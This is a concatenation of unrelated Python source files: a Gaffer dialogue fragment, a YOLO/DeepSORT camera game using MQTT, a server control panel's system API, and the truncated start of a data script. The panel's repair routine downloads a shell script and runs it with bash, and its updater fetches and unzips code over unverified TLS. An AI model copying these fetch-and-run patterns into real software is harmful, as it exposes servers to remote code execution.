for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "opDialogueSuccessWarning.png" if problems else "opDialogueSuccess.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerPlugValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
input_test.py
|
import threading
import argparse
def get_input():
angle0 = float(input())
return angle0
for i in range(10):
if i%2==0:
print("type : ")
input_thread = threading.Thread(target=get_input)
input_thread.start()
|
no_tracker.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import sys
#sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
import os
import datetime
from timeit import time
import warnings
import cv2
import numpy as np
import argparse
from PIL import Image
from yolo import YOLO
from deep_sort import preprocessing
from deep_sort import nn_matching
from deep_sort.detection import Detection
from deep_sort.tracker import Tracker
from tools import generate_detections as gdet
from deep_sort.detection import Detection as ddet
from collections import deque
from keras import backend
import tensorflow as tf
from tensorflow.compat.v1 import InteractiveSession
#module for serial listening
import threading
import time
import random
import serial
# module for mqtt
import paho.mqtt.client as mqtt
from math import sqrt
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
session = InteractiveSession(config=config)
#serial listening settings
PORT = '/dev/ttyUSB0'
detect = 0
#mqtt setting
mqtt_topic = "Nano/player/IMU"
mqtt_broker_ip = "140.113.213.21"
mqtt_topic_pulish = "Server/player/ANS"
client = mqtt.Client()
player_flag = [0, 0, 0]
player_camera_move = [0,0,0]
player_list = ["player001", "player002", "player003"]
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input",help="path to input video", default = "./test_video/TownCentreXVID.avi")
ap.add_argument("-c", "--class",help="name of class", default = "person")
args = vars(ap.parse_args())
pts = [deque(maxlen=30) for _ in range(9999)]
warnings.filterwarnings('ignore')
# initialize a list of colors to represent each possible class label
np.random.seed(100)
COLORS = np.random.randint(0, 255, size=(200, 3),
dtype="uint8")
#list = [[] for _ in range(100)]
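# get_iou() returns intersection-over-union for two boxes given as (x, y, w, h):
# the overlap rectangle is clamped to zero width/height when the boxes do not
# intersect, and the result is intersection_area divided by the union of the two areas.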
def get_iou(bbox_ai, bbox_gt):
iou_x = max(bbox_ai[0], bbox_gt[0]) # x
iou_y = max(bbox_ai[1], bbox_gt[1]) # y
iou_w = min(bbox_ai[2]+bbox_ai[0], bbox_gt[2]+bbox_gt[0]) - iou_x # w
iou_w = max(iou_w, 0)
iou_h = min(bbox_ai[3]+bbox_ai[1], bbox_gt[3]+bbox_gt[1]) - iou_y # h
iou_h = max(iou_h, 0)
iou_area = iou_w * iou_h
all_area = bbox_ai[2]*bbox_ai[3] + bbox_gt[2]*bbox_gt[3] - iou_area
return max(iou_area/all_area, 0)
def listen(PORT):
global detect
print('Thread start listening')
print('Initial serial port......')
COM_PORT = PORT # serial port name
BAUD_RATES = 9600 # baud rate
ser = serial.Serial(COM_PORT, BAUD_RATES) # initialize the serial connection
time.sleep(2)
ser.write(b'reset\n')
print('Done')
time.sleep(1)
# countdown before starting
for i in range (3,-1,-1):
time.sleep(1)
print(i)
print('Thread : first back to player')
ser.write(b'start\n')
try:
while True:
data = ''
while ser.in_waiting: # if serial data is waiting...
data_raw = ser.readline() # read one line
data = data_raw.decode().strip() # decode with the default UTF-8 and strip the trailing newline
#print('raw data received:', data_raw)
#print('decoded data received:', data)
if data == 'Arduino : start turn back':
detect = 0
print('Thread : back to player')
if data == 'Arduino : finish turn front':
detect = 1
print('Thread : face to player')
except KeyboardInterrupt:
ser.close() # release the serial port object
print('Exit!')
def readSensor():
global detect,client
def on_connect(client, userdata, flags, rc):
print("Connected!", str(rc))
client.subscribe(mqtt_topic)
def on_message(client, userdata, msg):
global flag
get_message = str(msg.payload)
get_message = get_message.split("'")[1]
get_list = get_message.split(", ")
#print("Topic: ", msg.topic + "\nMessage: " + get_message)
#print(get_list)
total = sqrt(float(get_list[1])**2 + float(get_list[2])**2 + float(get_list[3])**2)
try:
if total > 1.1: # threshold for deciding that the player moved; adjust as needed
who = player_list.index(get_list[0])
if player_flag[who] == 0 and detect == 1:
client.publish(mqtt_topic_pulish,str(who+1))
print(get_list[0] + " move !")
player_flag[who] = 1
print(player_flag)
except:
pass
client.on_connect = on_connect
client.on_message = on_message
client.connect(mqtt_broker_ip, 1883)
client.loop_forever()
client.disconnect()
def main(yolo):
global player_flag
start = time.time()
max_cosine_distance = 0.3
nn_budget = None
nms_max_overlap = 1.0
counter = []
#deep_sort
model_filename = 'model_data/market1501.pb'
encoder = gdet.create_box_encoder(model_filename,batch_size=1)
frame_index = -1
video_capture = cv2.VideoCapture(0)
###########
# initialize frame for movement detector
ret, frame = video_capture.read()
avg = cv2.blur(frame, (4, 4))
avg_float = np.float32(avg)
###########
###########
# create thread to read serial input from arduino
t = threading.Thread(target = listen, args=(PORT,))
t.setDaemon(True)
t.start()
global detect
#create thread to read sensor data
t2 = threading.Thread(target = readSensor)
t2.setDaemon(True)
t2.start()
global client
###########
fps = 0.0
while True:
ret, frame = video_capture.read() # frame shape 640*480*3
if ret != True:
break
t1 = time.time()
######################
# movement detector
# blur the frame
blur = cv2.blur(frame, (4, 4))
# compute the difference between the current frame and the running average
diff = cv2.absdiff(avg, blur)
# convert the difference image to grayscale
gray = cv2.cvtColor(diff, cv2.COLOR_BGR2GRAY)
# keep only regions whose change exceeds the threshold
ret, thresh = cv2.threshold(gray, 25, 255, cv2.THRESH_BINARY)
# remove noise with morphological open/close operations
kernel = np.ones((5, 5), np.uint8)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=2)
thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=2)
# find contours of the changed regions
contours, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
moving_boxes = []
for c in contours:
# ignore regions that are too small
if cv2.contourArea(c) < 1000:
continue
# an object was detected; custom handling code can be added here...
# compute the bounding rectangle of the contour
(x, y, w, h) = cv2.boundingRect(c)
moving_boxes.append((x,y,w,h))
# draw the bounding box
#cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
# draw the contours (for debugging)
cv2.drawContours(frame, contours, -1, (0, 255, 255), 2)
######################
#image = Image.fromarray(frame)
image = Image.fromarray(frame[...,::-1]) #bgr to rgb
boxs, confidence, class_names = yolo.detect_image(image)
features = encoder(frame,boxs)
# score to 1.0 here).
detections = [Detection(bbox, 1.0, feature) for bbox, feature in zip(boxs, features)]
# Run non-maxima suppression.
boxes = np.array([d.tlwh for d in detections])
scores = np.array([d.confidence for d in detections])
indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)
detections = [detections[i] for i in indices]
# Call the tracker
# tracker.predict()
# tracker.update(detections)
i = int(0)
indexIDs = []
c = []
boxes = []
moving_record = []
#yolo bounding box
player = 1
#sort bounding box's order by the x coordinate in each box
sort_bbox = sorted(detections, key = lambda x: x.to_tlbr()[0])
for det in sort_bbox:
bbox = det.to_tlbr()
cv2.rectangle(frame,(int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])),(255,255,255), 2)
b0 = bbox[0]#.split('.')[0] + '.' + str(bbox[0]).split('.')[0][:1]
b1 = bbox[1]#.split('.')[0] + '.' + str(bbox[1]).split('.')[0][:1]
b2 = bbox[2]-bbox[0]#.split('.')[0] + '.' + str(bbox[3]).split('.')[0][:1]
b3 = bbox[3]-bbox[1]
#calculate each person's moving ratio
iou_sum = 0
for j in moving_boxes:
iou = get_iou(j,(b0,b1,b2,b3))
iou_sum += iou
moving_record.append((player,iou_sum))
player += 1
if detect == 1:
index = 0
for person,move in moving_record:
if move > 0.5 and player_flag[index] == 0:
print(f'player{index+1} camera move')
player_flag[index] = 1
client.publish(mqtt_topic_pulish,str(index+1))
index += 1
count = len(set(counter))
cv2.putText(frame, "Total Pedestrian Counter: "+str(count),(int(20), int(120)),0, 5e-3 * 200, (0,255,0),2)
cv2.putText(frame, "Current Pedestrian Counter: "+str(i),(int(20), int(80)),0, 5e-3 * 200, (0,255,0),2)
cv2.putText(frame, "FPS: %f"%(fps),(int(20), int(40)),0, 5e-3 * 200, (0,255,0),3)
cv2.namedWindow("YOLO4_Deep_SORT", 0)
cv2.resizeWindow('YOLO4_Deep_SORT', 1024, 768)
cv2.imshow('YOLO4_Deep_SORT', frame)
fps = ( fps + (1./(time.time()-t1)) ) / 2
frame_index = frame_index + 1
# Press Q to stop!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
##############
#update frame for movement detector, the last argument is updating rate
cv2.accumulateWeighted(blur, avg_float, 0.2)
avg = cv2.convertScaleAbs(avg_float)
#####################
print(" ")
print("[Finish]")
end = time.time()
video_capture.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main(YOLO())
|
system_api.py
|
# coding: utf-8
import psutil
import time
import os
import re
import math
import json
from flask import Flask, session
from flask import request
import db
import mw
import requests
import config_api
from threading import Thread
from time import sleep
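# mw_async: decorator that runs the wrapped function on a background Thread so
# slow operations (panel restart, server reboot) do not block the Flask request.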
def mw_async(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
class system_api:
setupPath = None
pids = None
def __init__(self):
self.setupPath = mw.getServerDir()
##### ----- start ----- ###
def networkApi(self):
data = self.getNetWork()
return mw.getJson(data)
def updateServerApi(self):
stype = request.args.get('type', 'check')
version = request.args.get('version', '')
return self.updateServer(stype, version)
def systemTotalApi(self):
data = self.getSystemTotal()
return mw.getJson(data)
def diskInfoApi(self):
diskInfo = self.getDiskInfo()
return mw.getJson(diskInfo)
def setControlApi(self):
stype = request.form.get('type', '')
day = request.form.get('day', '')
data = self.setControl(stype, day)
return data
def getLoadAverageApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getLoadAverageData(start, end)
return mw.getJson(data)
def getCpuIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getCpuIoData(start, end)
return mw.getJson(data)
def getDiskIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getDiskIoData(start, end)
return mw.getJson(data)
def getNetworkIoApi(self):
start = request.args.get('start', '')
end = request.args.get('end', '')
data = self.getNetWorkIoData(start, end)
return mw.getJson(data)
def rememoryApi(self):
os.system('sync')
scriptFile = mw.getRunDir() + '/script/rememory.sh'
mw.execShell("/bin/bash " + scriptFile)
data = self.getMemInfo()
return mw.getJson(data)
# restart the panel
def restartApi(self):
self.restartMw()
return mw.returnJson(True, '面板已重启!')
def restartServerApi(self):
if mw.isAppleSystem():
return mw.returnJson(False, "开发环境不可重起")
self.restartServer()
return mw.returnJson(True, '正在重启服务器!')
##### ----- end ----- ###
@mw_async
def restartMw(self):
sleep(0.3)
# cmd = mw.getRunDir() + '/scripts/init.d/mw restart'
# print cmd
mw.execShell('service mw restart')
@mw_async
def restartServer(self):
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行!')
mw.execShell("sync && init 6 &")
return mw.returnJson(True, '命令发送成功!')
# get PID by process name
def getPid(self, pname):
try:
if not self.pids:
self.pids = psutil.pids()
for pid in self.pids:
if psutil.Process(pid).name() == pname:
return True
return False
except:
return False
# check whether a port is in use
def isOpen(self, port):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('127.0.0.1', int(port)))
s.shutdown(2)
return True
except:
return False
# check whether the given process is alive
def checkProcess(self, pid):
try:
if not self.pids:
self.pids = psutil.pids()
if int(pid) in self.pids:
return True
return False
except:
return False
def getPanelInfo(self, get=None):
# get panel configuration
address = mw.GetLocalIp()
try:
try:
port = request.host.split(':')[1]
except:
port = mw.readFile('data/port.pl')
except:
port = '8888'
domain = ''
if os.path.exists('data/domain.conf'):
domain = mw.readFile('data/domain.conf')
autoUpdate = ''
if os.path.exists('data/autoUpdate.pl'):
autoUpdate = 'checked'
limitip = ''
if os.path.exists('data/limitip.conf'):
limitip = mw.readFile('data/limitip.conf')
templates = []
for template in os.listdir('templates/'):
if os.path.isdir('templates/' + template):
templates.append(template)
template = mw.readFile('data/templates.pl')
check502 = ''
if os.path.exists('data/502Task.pl'):
check502 = 'checked'
return {'port': port, 'address': address, 'domain': domain, 'auto': autoUpdate, '502': check502, 'limitip': limitip, 'templates': templates, 'template': template}
def getSystemTotal(self, interval=1):
# Get system statistics
data = self.getMemInfo()
cpu = self.getCpuInfo(interval)
data['cpuNum'] = cpu[1]
data['cpuRealUsed'] = cpu[0]
data['time'] = self.getBootTime()
data['system'] = self.getSystemVersion()
data['isuser'] = mw.M('users').where(
'username=?', ('admin',)).count()
data['version'] = '0.0.1'
return data
def getLoadAverage(self):
c = os.getloadavg()
data = {}
data['one'] = float(c[0])
data['five'] = float(c[1])
data['fifteen'] = float(c[2])
data['max'] = psutil.cpu_count() * 2
data['limit'] = data['max']
data['safe'] = data['max'] * 0.75
return data
def getAllInfo(self, get):
data = {}
# The original called CamelCase helpers (GetLoadAverage, GetTitle, ...) that
# do not exist on this class; the lowercase methods defined here are used.
data['load_average'] = self.getLoadAverage()
data['title'] = self.getTitle()
data['network'] = self.getNetWorkApi()
data['panel_status'] = not os.path.exists(
'/www/server/mdserver-web/data/close.pl')
import firewalls
ssh_info = firewalls.firewalls().GetSshInfo(None)
data['enable_ssh_status'] = ssh_info['status']
data['disable_ping_status'] = not ssh_info['ping']
data['time'] = self.getBootTime()
# data['system'] = self.GetSystemVersion();
# data['mem'] = self.GetMemInfo();
# web.ctx.session was a web.py leftover; read the version via config_api.
data['version'] = config_api.config_api().getVersion()
return data
def getTitle(self):
titlePl = 'data/title.pl'
title = 'Linux面板'
if os.path.exists(titlePl):
title = mw.readFile(titlePl).strip()
return title
def getSystemVersion(self):
# Get the operating system version
if mw.getOs() == 'darwin':
data = mw.execShell('sw_vers')[0]
data_list = data.strip().split("\n")
mac_version = ''
for x in data_list:
mac_version += x.split("\t")[1] + ' '
return mac_version
version = mw.readFile('/etc/redhat-release')
if not version:
version = mw.readFile(
'/etc/issue').strip().split("\n")[0].replace('\\n', '').replace('\\l', '').strip()
else:
version = version.replace('release ', '').strip()
return version
def getBootTime(self):
# Get the system boot time / uptime
start_time = psutil.boot_time()
run_time = time.time() - start_time
# conf = mw.readFile('/proc/uptime').split()
tStr = float(run_time)
min = tStr / 60
hours = min / 60
days = math.floor(hours / 24)
hours = math.floor(hours - (days * 24))
min = math.floor(min - (days * 60 * 24) - (hours * 60))
return mw.getInfo('已不间断运行: {1}天{2}小时{3}分钟', (str(int(days)), str(int(hours)), str(int(min))))
def getCpuInfo(self, interval=1):
# Get CPU info
cpuCount = psutil.cpu_count()
used = psutil.cpu_percent(interval=interval)
return used, cpuCount
def getMemInfo(self):
# Get memory info
mem = psutil.virtual_memory()
if mw.getOs() == 'darwin':
memInfo = {
'memTotal': mem.total / 1024 / 1024
}
memInfo['memRealUsed'] = memInfo['memTotal'] * (mem.percent / 100)
else:
memInfo = {
'memTotal': mem.total / 1024 / 1024,
'memFree': mem.free / 1024 / 1024,
'memBuffers': mem.buffers / 1024 / 1024,
'memCached': mem.cached / 1024 / 1024
}
memInfo['memRealUsed'] = memInfo['memTotal'] - \
memInfo['memFree'] - memInfo['memBuffers'] - \
memInfo['memCached']
return memInfo
def getMemUsed(self):
# Get memory usage percentage
try:
import psutil
mem = psutil.virtual_memory()
if mw.getOs() == 'darwin':
return mem.percent
memInfo = {'memTotal': mem.total / 1024 / 1024, 'memFree': mem.free / 1024 / 1024,
'memBuffers': mem.buffers / 1024 / 1024, 'memCached': mem.cached / 1024 / 1024}
tmp = memInfo['memTotal'] - memInfo['memFree'] - \
memInfo['memBuffers'] - memInfo['memCached']
tmp1 = memInfo['memTotal'] / 100
return (tmp / tmp1)
except Exception as ex:
return 1
def getDiskInfo(self, get=None):
return self.getDiskInfo2()
# NOTE: the psutil-based implementation below is unreachable legacy code.
# Get disk partition info
diskIo = psutil.disk_partitions()
diskInfo = []
for disk in diskIo:
if disk[1] == '/mnt/cdrom':
continue
if disk[1] == '/boot':
continue
tmp = {}
tmp['path'] = disk[1]
tmp['size'] = psutil.disk_usage(disk[1])
diskInfo.append(tmp)
return diskInfo
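# getDiskInfo2 below shells out to `df -h -P` and `df -i -P`, pairs each
# mount's size columns with its inode columns, and skips pseudo filesystems,
# K/M-sized mounts, common system mount points, and deeply nested paths.
# Sketch of one returned entry (values illustrative, not real output):
#     {'path': '/', 'size': ['40G', '12G', '28G', '30%'],
#      'inodes': ['2621440', '301234', '2320206', '12%']}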
def getDiskInfo2(self):
# Get disk partition info
temp = mw.execShell(
"df -h -P|grep '/'|grep -v tmpfs | grep -v devfs")[0]
tempInodes = mw.execShell(
"df -i -P|grep '/'|grep -v tmpfs | grep -v devfs")[0]
temp1 = temp.split('\n')
tempInodes1 = tempInodes.split('\n')
diskInfo = []
n = 0
cuts = ['/mnt/cdrom', '/boot', '/boot/efi', '/dev',
'/dev/shm', '/run/lock', '/run', '/run/shm', '/run/user']
for tmp in temp1:
n += 1
inodes = tempInodes1[n - 1].split()
disk = tmp.split()
if len(disk) < 5:
continue
if disk[1].find('M') != -1:
continue
if disk[1].find('K') != -1:
continue
if len(disk[5].split('/')) > 4:
continue
if disk[5] in cuts:
continue
arr = {}
arr['path'] = disk[5]
tmp1 = [disk[1], disk[2], disk[3], disk[4]]
arr['size'] = tmp1
arr['inodes'] = [inodes[1], inodes[2], inodes[3], inodes[4]]
if disk[5] == '/':
bootLog = os.getcwd() + '/tmp/panelBoot.pl'
if disk[2].find('M') != -1:
if os.path.exists(bootLog):
os.system('rm -f ' + bootLog)
else:
if not os.path.exists(bootLog):
pass
if inodes[2] != '0':
diskInfo.append(arr)
return diskInfo
# Clean up system junk files
def clearSystem(self, get):
count = total = 0
tmp_total, tmp_count = self.clearMail()
count += tmp_count
total += tmp_total
tmp_total, tmp_count = self.clearOther()
count += tmp_count
total += tmp_total
return count, total
# Clean up mail/spool files
def clearMail(self):
rpath = '/var/spool'
total = count = 0
import shutil
con = ['cron', 'anacron', 'mail']
for d in os.listdir(rpath):
if d in con:
continue
dpath = rpath + '/' + d
time.sleep(0.2)
num = size = 0
for n in os.listdir(dpath):
filename = dpath + '/' + n
fsize = os.path.getsize(filename)
size += fsize
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
print('\t\033[1;32m[OK]\033[0m')
num += 1
total += size
count += num
return total, count
# Clean up other leftover files
def clearOther(self):
# shutil was only imported inside clearMail; import it here too since
# shutil.rmtree is used below.
import shutil
clearPath = [
{'path': '/www/server/mdserver-web', 'find': 'testDisk_'},
{'path': '/www/wwwlogs', 'find': 'log'},
{'path': '/tmp', 'find': 'panelBoot.pl'},
{'path': '/www/server/mdserver-web/install', 'find': '.rpm'}
]
total = count = 0
for c in clearPath:
for d in os.listdir(c['path']):
if d.find(c['find']) == -1:
continue
filename = c['path'] + '/' + d
fsize = os.path.getsize(filename)
total += fsize
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
os.remove(filename)
count += 1
mw.serviceReload()
os.system('echo > /tmp/panelBoot.pl')
return total, count
def getNetWork(self):
# return self.getNetWorkApi()
# Get network traffic info
try:
# Throughput is computed against the previous sample stored in the session.
networkIo = psutil.net_io_counters()[:4]
if not "otime" in session:
session['up'] = networkIo[0]
session['down'] = networkIo[1]
session['otime'] = time.time()
ntime = time.time()
networkInfo = {}
networkInfo['upTotal'] = networkIo[0]
networkInfo['downTotal'] = networkIo[1]
networkInfo['up'] = round(float(
networkIo[0] - session['up']) / 1024 / (ntime - session['otime']), 2)
networkInfo['down'] = round(
float(networkIo[1] - session['down']) / 1024 / (ntime - session['otime']), 2)
networkInfo['downPackets'] = networkIo[3]
networkInfo['upPackets'] = networkIo[2]
# print networkIo[1], session['down'], ntime, session['otime']
session['up'] = networkIo[0]
session['down'] = networkIo[1]
session['otime'] = time.time()
networkInfo['cpu'] = self.getCpuInfo()
networkInfo['load'] = self.getLoadAverage()
networkInfo['mem'] = self.getMemInfo()
return networkInfo
except Exception as e:
print(e)
return None
def getNetWorkApi(self):
# Get network traffic info
try:
tmpfile = 'data/network.temp'
networkIo = psutil.net_io_counters()[:4]
if not os.path.exists(tmpfile):
mw.writeFile(tmpfile, str(
networkIo[0]) + '|' + str(networkIo[1]) + '|' + str(int(time.time())))
lastValue = mw.readFile(tmpfile).split('|')
ntime = time.time()
networkInfo = {}
networkInfo['upTotal'] = networkIo[0]
networkInfo['downTotal'] = networkIo[1]
networkInfo['up'] = round(
float(networkIo[0] - int(lastValue[0])) / 1024 / (ntime - int(lastValue[2])), 2)
networkInfo['down'] = round(
float(networkIo[1] - int(lastValue[1])) / 1024 / (ntime - int(lastValue[2])), 2)
networkInfo['downPackets'] = networkIo[3]
networkInfo['upPackets'] = networkIo[2]
mw.writeFile(tmpfile, str(
networkIo[0]) + '|' + str(networkIo[1]) + '|' + str(int(time.time())))
# networkInfo['cpu'] = self.GetCpuInfo(0.1)
return networkInfo
except:
return None
def getNetWorkIoData(self, start, end):
# Get network IO for the given time range
data = mw.M('network').dbfile('system').where("addtime>=? AND addtime<=?", (start, end)).field(
'id,up,down,total_up,total_down,down_packets,up_packets,addtime').order('id asc').select()
return self.toAddtime(data)
def getDiskIoData(self, start, end):
# Get disk IO for the given time range
data = mw.M('diskio').dbfile('system').where("addtime>=? AND addtime<=?", (start, end)).field(
'id,read_count,write_count,read_bytes,write_bytes,read_time,write_time,addtime').order('id asc').select()
return self.toAddtime(data)
def getCpuIoData(self, start, end):
# Get CPU IO for the given time range
data = mw.M('cpuio').dbfile('system').where("addtime>=? AND addtime<=?",
(start, end)).field('id,pro,mem,addtime').order('id asc').select()
return self.toAddtime(data, True)
def getLoadAverageData(self, start, end):
data = mw.M('load_average').dbfile('system').where("addtime>=? AND addtime<=?", (
start, end)).field('id,pro,one,five,fifteen,addtime').order('id asc').select()
return self.toAddtime(data)
# Format the addtime column
def toAddtime(self, data, tomem=False):
import time
if tomem:
import psutil
mPre = (psutil.virtual_memory().total / 1024 / 1024) / 100
length = len(data)
he = 1
if length > 100:
he = 1
if length > 1000:
he = 3
if length > 10000:
he = 15
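# When he == 1 (at most 1000 rows) every row is formatted below; otherwise the
# else-branch keeps only one row out of every (he + 1) rows (he = 3 keeps
# 1 in 4, he = 15 keeps 1 in 16) to thin out long monitoring ranges.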
if he == 1:
for i in range(length):
data[i]['addtime'] = time.strftime(
'%m/%d %H:%M', time.localtime(float(data[i]['addtime'])))
if tomem and data[i]['mem'] > 100:
data[i]['mem'] = data[i]['mem'] / mPre
return data
else:
count = 0
tmp = []
for value in data:
if count < he:
count += 1
continue
value['addtime'] = time.strftime(
'%m/%d %H:%M', time.localtime(float(value['addtime'])))
if tomem and value['mem'] > 100:
value['mem'] = value['mem'] / mPre
tmp.append(value)
count = 0
return tmp
def setControl(self, stype, day):
filename = 'data/control.conf'
if stype == '0':
mw.execShell("rm -f " + filename)
elif stype == '1':
_day = int(day)
if _day < 1:
return mw.returnJson(False, "设置失败!")
mw.writeFile(filename, day)
elif stype == 'del':
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行')
os.remove("data/system.db")
sql = db.Sql().dbfile('system')
csql = mw.readFile('data/sql/system.sql')
csql_list = csql.split(';')
for index in range(len(csql_list)):
sql.execute(csql_list[index], ())
return mw.returnJson(True, "监控服务已关闭")
else:
data = {}
if os.path.exists(filename):
try:
data['day'] = int(mw.readFile(filename))
except:
data['day'] = 30
data['status'] = True
else:
data['day'] = 30
data['status'] = False
return mw.getJson(data)
return mw.returnJson(True, "设置成功!")
def versionDiff(self, old, new):
'''
test  a test/pre-release version is available
new   a new version is available
none  no new version
'''
new_list = new.split('.')
if len(new_list) > 3:
return 'test'
old_list = old.split('.')
ret = 'none'
isHasNew = True
if int(new_list[0]) == int(old_list[0]) and int(new_list[1]) == int(old_list[1]) and int(new_list[2]) == int(old_list[2]):
isHasNew = False
if isHasNew:
return 'new'
return ret
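# Illustrative behaviour of versionDiff (version strings hypothetical):
#   versionDiff('0.1.0', '0.1.1')   -> 'new'    (any differing x.y.z)
#   versionDiff('0.1.1', '0.1.1')   -> 'none'
#   versionDiff('0.1.1', '0.1.1.1') -> 'test'   (four components)
# Only equality is checked, so a remote version lower than the local one is
# still reported as 'new'.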
def getServerInfo(self):
upAddr = 'https://raw.githubusercontent.com/midoks/mdserver-web/master/version/info.json'
try:
requests.adapters.DEFAULT_RETRIES = 2
r = requests.get(upAddr, verify=False)
version = json.loads(r.content)
return version[0]
except Exception as e:
print('getServerInfo', e)
return {}
def updateServer(self, stype, version=''):
# Update the panel
try:
if not mw.isRestart():
return mw.returnJson(False, '请等待所有安装任务完成再执行!')
if stype == 'check':
version_now = config_api.config_api().getVersion()
version_new_info = self.getServerInfo()
if not 'version' in version_new_info:
return mw.returnJson(False, '服务器数据或网络有问题!')
diff = self.versionDiff(
version_now, version_new_info['version'])
if diff == 'new':
return mw.returnJson(True, '有新版本!', version_new_info['version'])
elif diff == 'test':
return mw.returnJson(True, '有测试版本!', version_new_info['version'])
else:
return mw.returnJson(False, '已经是最新,无需更新!')
if stype == 'info':
version_new_info = self.getServerInfo()
version_now = config_api.config_api().getVersion()
if not 'version' in version_new_info:
return mw.returnJson(False, '服务器数据有问题!')
diff = self.versionDiff(
version_now, version_new_info['version'])
return mw.returnJson(True, '更新信息!', version_new_info)
if stype == 'update':
if version == '':
return mw.returnJson(False, '缺少版本信息!')
v_new_info = self.getServerInfo()
if v_new_info['version'] != version:
return mw.returnJson(False, '更新失败,请重试!')
if not 'path' in v_new_info or v_new_info['path'] == '':
return mw.returnJson(False, '下载地址不存在!')
newUrl = v_new_info['path']
toPath = mw.getRootDir() + '/temp'
if not os.path.exists(toPath):
mw.execShell('mkdir -p ' + toPath)
mw.execShell('wget -O ' + toPath + '/mw.zip ' + newUrl)
mw.execShell('unzip -o ' + toPath + '/mw.zip' + ' -d ./')
mw.execShell('unzip -o mw.zip -d ./')
mw.execShell('rm -f mw.zip')
return mw.returnJson(True, '安装更新成功,需自己重启!')
return mw.returnJson(False, '已经是最新,无需更新!')
except Exception as ex:
print('updateServer', ex)
return mw.returnJson(False, "连接服务器失败!")
# Repair the panel
def repPanel(self, get):
vp = ''
if mw.readFile('/www/server/mdserver-web/class/common.py').find('checkSafe') != -1:
vp = '_pro'
mw.execShell("wget -O update.sh " + mw.get_url() +
"/install/update" + vp + ".sh && bash update.sh")
# web.ctx.session was a web.py leftover; the Flask session imported above is
# used here instead.
if 'getCloudPlugin' in session:
del session['getCloudPlugin']
return True
|
generate_game_numpy_arrays.py
|
import multiprocessing
# os is used throughout this module; import it explicitly rather than relying
# on the star import from settings to provide it.
import os
import numpy as np
import pandas as pd
import pickle
import py7zr
import shutil
from settings import *
HALF_COURT_LENGTH = COURT_LENGTH // 2
THRESHOLD = 1.0
def game_name2gameid_worker(game_7zs, queue):
game_names = []
gameids = []
for game_7z in game_7zs:
game_name = game_7z.split(".7z")[0]
game_names.append(game_name)
try:
